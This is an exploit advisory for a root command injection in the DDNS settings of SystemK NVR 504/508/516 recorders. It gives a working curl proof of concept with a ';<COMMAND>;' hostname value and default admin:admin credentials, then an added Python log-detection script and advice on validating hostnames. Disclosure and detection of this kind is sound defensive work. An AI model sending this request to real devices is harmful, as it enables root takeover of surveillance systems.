## https://sploitus.com/exploit?id=PACKETSTORM:173005
# Exploit Title: SystemK NVR 504/508/516 Command Injection  
# Exploit Author: Keniver Wang  
# Publish Date: 19/06/2023  
# Date Found: 20/01/2021  
# Vendor: SystemK  
# Vendor Homepage: https://nvr.bz/  
# Version: NVR 504/508/516 2.3.5SK.30084998  
  
# Greets:  
Weber Tsai (CHT Security)  
  
# Description  
A Command Injection vulnerability in the DDNS Setting allows an  
attacker to execute arbitrary commands with root privileges.  
  
# Proof of Concept  
curl 'http://<IP>/ddnsserver.cgi?action=test&address=members.dyndns.org&type=dyndns&username=&password=&hostname=;<COMMAND>;&updatetime=300' \
-X 'POST' \
-H 'Connection: keep-alive' \
-H 'Content-Length: 0' \
-H 'Authorization: Basic YWRtaW46YWRtaW4=' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)' \
-H 'Accept: */*' \
-H 'Accept-Language: zh-TW,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'
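
A detection check for the request shown above, as an added example that is not part of the original advisory: it scans web access-log lines for ddnsserver.cgi requests whose hostname parameter is not a syntactically valid DNS name. It assumes a reverse proxy or capture point in front of the NVR that writes Combined Log Format; the log lines, IP addresses, the "CMD" placeholder and the inclusion of the address parameter are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One DNS label: letters, digits, inner hyphens, at most 63 characters.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")
# Client address and request line of a Combined Log Format entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+"')
# "hostname" is the parameter used in the advisory's request; "address" is
# included as an assumption because it also carries a host name.
HOST_PARAMS = ("hostname", "address")

# Constructed sample entries (documentation IP ranges, placeholder payload "CMD").
_Q = "action=test&address=members.dyndns.org&type=dyndns&username=&password="
SAMPLE_LOG = [
    f'192.0.2.10 - admin [19/Jun/2023:10:00:01 +0000] "POST /ddnsserver.cgi?{_Q}&hostname=cam1.example.org&updatetime=300 HTTP/1.1" 200 12',
    f'198.51.100.7 - admin [19/Jun/2023:10:02:44 +0000] "POST /ddnsserver.cgi?{_Q}&hostname=;CMD;&updatetime=300 HTTP/1.1" 200 12',
    f'198.51.100.7 - admin [19/Jun/2023:10:03:10 +0000] "POST /ddnsserver.cgi?{_Q}&hostname=%3BCMD%3B&updatetime=300 HTTP/1.1" 200 12',
    '192.0.2.10 - - [19/Jun/2023:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

def is_valid_hostname(value):
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None

def suspicious_ddns_requests(log_lines):
    """Return (client, parameter, decoded value) for every ddnsserver.cgi
    request whose host parameter is not a syntactically valid hostname."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/ddnsserver.cgi"):
            continue
        # Split on "&" only, then percent-decode, so ";" and "%3B" look alike.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)
            if name in HOST_PARAMS and value and not is_valid_hostname(value):
                hits.append((client, name, value))
    return hits

if __name__ == "__main__":
    for client, name, value in suspicious_ddns_requests(SAMPLE_LOG):
        print(f"ALERT {client}: {name}={value!r} is not a valid hostname")
```

The same allow-list test (accept only a syntactically valid hostname, reject everything else) is the input validation the DDNS handler would need before the value reaches a shell.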